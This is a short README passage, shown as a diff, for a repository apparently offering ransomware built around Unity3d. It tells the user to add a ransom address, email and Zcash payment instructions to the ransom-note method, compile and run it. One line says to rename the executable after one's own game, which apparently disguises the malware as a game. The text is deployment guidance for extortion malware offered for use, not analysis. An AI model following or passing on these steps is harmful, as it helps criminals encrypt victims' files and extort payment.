TheGodRX/Unity3d_Ransomware/README.md

 * Allows for decryption of files with the input of correct decryption key

 ## Instructions
+(change the name of the .exe file to suit the name of your compiled game name.. ex:   My_Game.exe)
 1. Download or clone the repository to your system.
 2. Add your ransom address, email, and Zcash payment receipt instructions in the `GenerateRansomNotes()` method in the `Ransomware.cs` file.
 3. Compile and run the program.